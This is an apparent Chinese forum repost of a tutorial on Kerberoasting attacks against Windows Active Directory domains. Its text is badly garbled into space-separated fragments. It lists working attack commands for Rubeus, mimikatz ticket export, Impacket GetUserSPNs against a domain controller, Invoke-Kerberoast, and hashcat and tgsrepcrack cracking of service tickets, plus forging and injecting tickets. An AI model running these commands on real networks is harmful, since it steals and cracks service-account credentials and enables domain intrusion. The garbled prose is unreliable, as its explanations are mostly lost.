[26983] 2020-05-09_内网渗透(二)域渗透之Kerberoast攻击

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2020-05-09_内网渗透(二)域渗透之Kerberoast攻击   |   K e r b e r o a s t M s 0 8 0 6 7   2 0 2 0 - 0 5 - 0 9   K e r b e r o a s t k e r b e r o a s t k e r b e r o s T G S _ R E P k e r b e r o s   |   K e r b e r o s K e r b e r o a s t 1 . T G T   T G T S T 2 . 使   T G T   S T ( T G S - R E Q )   n a m e / h o s t   s e r v i c e P r i n c i p a l N a m e   ( S P N ) M S S q l S v c / S Q L . d o m a i n . c o m S P N s e r v i c e P r i n c i p a l N a m e   ( T G S - R E Q ) K e r b e r o s ( R C 4 _ H M A C A E S 2 5 6 _ C T S _ H M A C _ S H A 1 _ 9 6 ) 3 .   T G T     D C   T G T   S T   S e r v i c e d P r i n c i p a l N a m e     S P N S T 使   S P N   N T L M ,   使 S T ( T G S - R E P ) 4 .   T G S - R E P     S P N   线 S P N S P N 使 R u b e u s R u b e u s k e r b e r o a s t k e r b e r o a s t i n g L D A P s p n T G S 使   h a s h c a t     j o h n   H a s h   S P N h a s h c a t   .   线 R u b e u s . e x e   k e r b e r o a s t

p o w e r s h e l l S P N # A d d - T y p e   - A s s e m b l y N a m e   S y s t e m . I d e n t i t y M o d e l N e w - O b j e c t   S y s t e m . I d e n t i t y M o d e l . T o k e n s . K e r b e r o s R e q u e s t o r S e c u r i t y T o k e n   - A r g u m e n t L i s t   " M y S Q L / w i n 7 . x i e . c o m : 3 3 0 6 / M y S Q L " # k l i s t
m i m i k a t z S P N I m p a c k e t G e t U s e r S P N S . p y S P N 使 h a s h c a t h a s h c a t # k e r b e r o s : : a s k   / t a r g e t : M y S Q L / w i n 7 . x i e . c o m : 3 3 0 6   # k e r b e r o s : : l i s t     # k e r b e r o s : : p u r g e . / G e t U s e r S P N s . p y   - r e q u e s t   - d c - i p   1 9 2 . 1 6 8 . 1 0 . 1 3 1   x i e . c o m / h a c k
使 k l i s t m i m i k a t z . e x e   " k e r b e r o s : : l i s t " M S F l o a d   k i w i k e r b e r o s _ t i c k e t _ l i s t l o a d   k i w i k i w i _ c m d   k e r b e r o s : : l i s t
m i m i k a t z m i m i k a t z   k i r b i m i m i k a t z . e x e   " k e r b e r o s : : l i s t   / e x p o r t "   " e x i t "
E m p i r e I n v o k e - K e r b e r o a s t . p s 1 H a s h c a t I m p o r t - M o d u l e   . I n v o k e - K e r b e r o a s t . p s 1 ; I n v o k e - K e r b e r o a s t   - o u t p u t F o r m a t   H a s h c a t
线 线 k e r b e r o a s t t g s r e p c r a c k . p y t g s c r a c k H a s h c a t h a s h c a t h a s h . t x t h a s h c a t p y t h o n 2   t g s r e p c r a c k . p y   p a s s w o r d . t x t   x x . k i r b i p y t h o n 2   e x t r a c t S e r v i c e T i c k e t P a r t s . p y   1 - 4 0 a 0 0 0 0 0 - h a c k @ M y S Q L ~ w i n 7 . x i e . c o m ~ 3 3 0 6 ~ M y S Q L - X I E . C O M . k i r b i   >   h a s h . t x t g o   r u n   t g s c r a c k . g o   - h a s h f i l e   h a s h . t x t   - w o r d l i s t   p a s s w o r d . t x t h a s h c a t 6 4 . e x e   - m     1 3 1 0 0     h a s h . t x t     p a s s . t x t

& R A M S T 使 N T L M 使 K e r b e r o a s t   p y t h o n 访 使 M i m i k a t z 便 K e r b e r o s K e r b e r o a s t ( ) A E S 2 5 6 _ H M A C R C 4 _ H M A C _ M D 5   t g s r e p c r a c k . p y K e r b e r o s   T G S A E S 2 5 6 _ H M A C K e r b e r o s 使 K e r b e r o s I D 4 6 7 9 ( K e r b e r o s )   4 7 6 9   2 5 0 0 0 + p y t h o n   k e r b e r o a s t . p y   - p   P a s s w o r d 1 2 3   - r   P E N T E S T L A B _ 0 0 1 . k i r b i   - w   P E N T E S T L A B . k i r b i   - u   5 0 0 p y t h o n   k e r b e r o a s t . p y   - p   P a s s w o r d 1 2 3   - r   P E N T E S T L A B _ 0 0 1 . k i r b i   - w   P E N T E S T L A B . k i r b i   - g   5 1 2 k e r b e r o s : : p t t   P E N T E S T L A B . k i r b i
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则